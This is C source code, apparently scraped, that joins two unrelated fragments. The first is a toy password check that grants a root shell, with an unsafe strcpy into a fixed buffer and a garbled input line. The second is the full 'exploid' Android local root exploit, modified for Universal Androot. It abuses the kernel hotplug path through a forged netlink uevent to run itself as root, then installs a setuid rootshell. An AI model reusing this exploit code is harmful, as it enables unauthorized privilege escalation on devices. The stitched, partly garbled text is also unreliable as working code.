int main(){ char real_pass[100]; char user_pass[100]; size_t len = 0; //get root password from file FILE * source = fopen("password.txt","r"); if (source == NULL){ perror("fopen"); printf("Unable to read password.txt!"); return; } char * buf = NULL; while(getline(&buf, &len, source) > 0){ strcpy(real_pass,buf); } fclose(source); int len2 = strlen(real_pass); if(real_pass[len2-1] == '\n') real_pass[len2-1] = 0; //get user's attempt printf("enter root password: "******"%s", user_pass); if(strcmp(real_pass,user_pass) == 0){ printf("here comes a shell!\n"); rootshell(); }else{ printf("incorrect password"); } }
int main(int argc, char **argv, char **env) { char buf[512], path[512], buf2[512]; int ofd, ifd; struct sockaddr_nl snl; struct iovec iov = {buf, sizeof(buf)}; struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0}; int sock; char *basedir = NULL; int len; char path_fix[512]; /* shakalaca: check if this program is called from UI or from CLI { */ char pwd[128]; memset(pwd, 0, sizeof(pwd)); readlink("/proc/self/fd/0", pwd, sizeof(pwd)); /* shakalaca: check if this program is called from UI or from CLI } */ /* I hope there is no LD_ bug in androids rtld :) */ if (geteuid() == 0 && getuid() != 0) rootshell(env, argv); memset(path, 0, sizeof(path)); if (readlink("/proc/self/exe", path, sizeof(path)) < 0) die("[-] readlink"); len = strlen(path); if (path[len - 1] > 127) { len--; } if (geteuid() == 0) { char mp[128], fstype[16]; clear_hotplug(); strncpy(path_fix, path, len); path_fix[len] = '\0'; /* remount /system rw */ /* shakalaca: read mount settings from file { */ /* if (mount("/dev/mtdblock0", "/system", "yaffs2", MS_REMOUNT, 0) < 0) mount("/dev/mtdblock0", "/system", "yaffs", MS_REMOUNT, 0); */ /* test /sqlite_stmt_journals first */ if ((ofd = creat("/sqlite_stmt_journals/test", 0644)) < 0) { /* failed, try /app-cache or /data/local/tmp. either way should mount /data first, in case failed */ /* shakalaca: check mount file and change to right directory */ if ((ifd = open("/sqlite_stmt_journals/mount", O_RDONLY)) < 0) { if ((ifd = open("/data/local/tmp/mount", O_RDONLY)) < 0) { if ((ifd = open("/data/data/com.corner23.android.universalandroot/files/mount", O_RDONLY)) < 0) { die("[-] missing required files.."); } else { close(ifd); chdir("data/data/com.corner23.android.universalandroot/files/"); } } else { close(ifd); chdir("/data/local/tmp"); } } else { close(ifd); chdir("/sqlite_stmt_journals"); } if ((ifd = open("mount", O_RDONLY)) < 0) die("[-] open mount point"); if (read(ifd, mp, sizeof(mp)) < 0) die("[-] read mount point"); close(ifd); if ((ifd = open("fs_type", O_RDONLY)) < 0) die("[-] open fs type"); if (read(ifd, fstype, sizeof(fstype)) < 0) die("[-] read fs type"); close(ifd); mount(mp, "/data", fstype, MS_REMOUNT, 0); /* shakalaca: read mount settings from file } */ if ((ofd = creat("/app-cache/test", 0644)) < 0) { copy(path_fix, "/data/local/tmp/rootshell"); chmod("/data/local/tmp/rootshell", 04711); } else { close(ofd); unlink("/app-cache/test"); if (copy(path_fix, "/app-cache/rootshell") < 0) { copy(path_fix, "/data/local/tmp/rootshell"); chmod("/data/local/tmp/rootshell", 04711); } else { chmod("/app-cache/rootshell", 04711); } } } else { close(ofd); unlink("/sqlite_stmt_journals/test"); copy(path_fix, "/sqlite_stmt_journals/rootshell"); chmod("/sqlite_stmt_journals/rootshell", 04711); } /* shakalaca: do not loop forever, it will eat cpu resource { */ /* for (;;); */ exit(1); /* shakalaca: do not loop forever, it will eat cpu resource } */ } printf("[*] Android local root exploid (C) The Android Exploid Crew\n"); printf("[*] Modified by shakalaca for various devices\n"); /* basedir = "/sqlite_stmt_journals"; if (chdir(basedir) < 0) { basedir = "/data/local/tmp"; if (chdir(basedir) < 0) basedir = strdup(getcwd(buf, sizeof(buf))); } */ basedir = "/sqlite_stmt_journals"; if (chdir(basedir) < 0) { basedir = strdup(getcwd(buf, sizeof(buf))); if (chdir("/data/local/tmp") < 0) { // Use from Android UI, fall back to project directory if (strncmp(pwd, "/dev/pts/", 9) != 0) { basedir = "/data/data/com.corner23.android.universalandroot/files"; if (chdir(basedir) < 0) die("[-] chdir"); } } else { // test if it's writable if ((ofd = creat("test", 0644)) < 0) { if (strncmp(pwd, "/dev/pts/", 9) != 0) { // Use from Android UI, fall back to project directory basedir = "/data/data/com.corner23.android.universalandroot/files"; } if (chdir(basedir) < 0) die("[-] chdir"); } else { basedir = "/data/local/tmp"; unlink("test"); } close(ofd); } } printf("[+] Using basedir=%s, path=%s\n", basedir, path); printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n"); /* shakalaca: remove old data if possible { */ unlink("data"); unlink("hotplug"); unlink("loading"); unlink("mount"); unlink("fs_type"); /* shakalaca: remove old data if possible } */ memset(&snl, 0, sizeof(snl)); snl.nl_pid = 1; snl.nl_family = AF_NETLINK; if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0) die("[-] socket"); close(creat("loading", 0666)); if ((ofd = creat("hotplug", 0644)) < 0) die("[-] creat"); if (write(ofd, path, len) < 0) die("[-] write"); close(ofd); /* shakalaca: for remember mount device and filesystem type of /system { */ if ((ofd = creat("mount", 0644)) < 0) die("[-] creat mount point"); if (write(ofd, argv[1], strlen(argv[1])) < 0) die("[-] write mount point"); close(ofd); if ((ofd = creat("fs_type", 0644)) < 0) die("[-] creat fs type"); if (write(ofd, argv[2], strlen(argv[2])) < 0) die("[-] write fs type"); close(ofd); /* shakalaca: for remember mount device and filesystem type of /system } */ symlink("/proc/sys/kernel/hotplug", "data"); snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c" "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0); printf("[+] sending add message ...\n"); if (sendmsg(sock, &msg, 0) < 0) die("[-] sendmsg"); close(sock); printf("[*] Try to invoke hotplug now, clicking at the wireless\n" "[*] settings, plugin USB key etc.\n" "[*] You succeeded if you find /system/bin/rootshell.\n" "[*] GUI might hang/restart meanwhile so be patient.\n"); sleep(1); return 0; }